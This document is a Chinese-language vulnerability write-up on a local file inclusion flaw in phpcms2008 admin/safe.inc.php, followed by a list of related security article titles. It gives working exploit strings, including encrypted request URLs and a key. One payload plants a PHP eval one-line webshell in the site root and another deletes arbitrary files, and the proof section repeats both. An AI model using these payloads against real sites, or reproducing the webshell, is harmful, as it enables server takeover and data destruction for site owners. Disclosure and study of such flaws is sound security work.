Phpcms本地包含漏洞導致的寫shell漏洞和刪除任意文件漏洞

發(fā)布日期:2011-05.04
發(fā)布作者:c4rp3nt3r
影響版本:phpcms2008 sp2 or sp4
官方地址:http://www.phpcms.cn
漏洞類型:文件包含
漏洞描述:phpcms本地包含類漏洞,如果該文件包含了/include/common.inc.php就可以包含執(zhí)行很多后臺才能執(zhí)行的文件了。
由于phpcms的全局變量機制,導致能拿shell的方法很多,類似的問題不止一個。
admin/safe.inc.php文件是后臺掃木馬的程序,但是很可惜的是雖然文件名叫做safe,但是一點也不safe。
公布一個本地包含秒殺拿shell的方法。
包含:admin/safe.inc.php文件GET提交一下數(shù)據(jù)
將在根目錄下生成一句話
用上一篇得到的密鑰$key='sIpeofogblFVCildZEwe';
加密如下字符串
$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=
將在根目錄下生成一句話木馬
同理任意文件刪除漏洞:
$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==
參考:Flyh4t [PhpCMS]一個漏洞的二次利用
詳細說明:
貼上存在漏洞的代碼
//admin/safe.inc.php
<?php
defined('IN_PHPCMS') or exit('Access Denied');
// include/common.inc.php 里面聲明了常量
// define('IN_PHPCMS', TRUE);
if(empty($action)) $action = "start";
$safe = cache_read('safe.php');
$filecheck = load('filecheck.class.php');
if(empty($safe))
{
$safe = array (
'file_type' => 'php|js',
'code' => '',
'func' => 'com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress',
'dir' => $filecheck->checked_dirs()
);
}
switch ($action)
{
...
case 'edit_code':
if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code)))
{
showmessage('修改成功!');
}
break;
case 'del_file':
$file_path = urldecode($files);
if (empty($file_path))
{
showmessage('請選擇文件');
}
$file_list = cache_read('scan_backdoor.php');
unset($file_list[$file_path]);
cache_write('scan_backdoor.php',$file_list);
@unlink(PHPCMS_ROOT.$file_path);
showmessage('文件刪除成功!', '?mod=phpcms&file=safe&action=scan_table');
break;
...
漏洞證明:
將在根目錄下生成一句話
用上一篇得到的密鑰$key='sIpeofogblFVCildZEwe';
加密如下字符串
$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=
將在根目錄下生成一句話木馬
同理任意文件刪除漏洞:
$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==
相關文章
thinkphp代碼執(zhí)行getshell的漏洞解決
本文來介紹一下thinkphp官方修復的一個getshell漏洞,框架對控制器沒有進行足夠的檢測導致的一處getshell,小編覺得挺不錯的,現(xiàn)在分享給大家,也給大家做個參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實網(wǎng)絡攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實網(wǎng)絡攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點服務端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
- 這篇文章主要介紹了SQL注入黑客防線網(wǎng)站實例分析,需要的朋友可以參考下2017-05-19
- 這里為大家分享一下sql注入的一些語句,很多情況下由于程序員的安全意識薄弱或基本功不足就容易導致sql注入安全問題,建議大家多看一下網(wǎng)上的安全文章,最好的防范就是先學2017-05-19
- 對于目前流行的sql注入,程序員在編寫程序時,都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會自動的記錄下你的IP地址,提交的非法參數(shù)和動作等,2017-04-29
- 我們友情進行XSS檢查,偶然跳出個小彈窗,其中我們總結了一些平時可能用到的XSS插入方式,方便我們以后進行快速檢查,也提供了一定的思路,其中XSS有反射、存儲、DOM這三類2016-12-27
- 這篇文章主要介紹了Python 爬蟲使用動態(tài)切換ip防止封殺的相關資料,需要的朋友可以參考下2016-10-08
- 這篇文章主要介紹了使用爬蟲采集網(wǎng)站時,解決被封IP的幾種方法的相關資料,需要的朋友可以參考下2016-10-08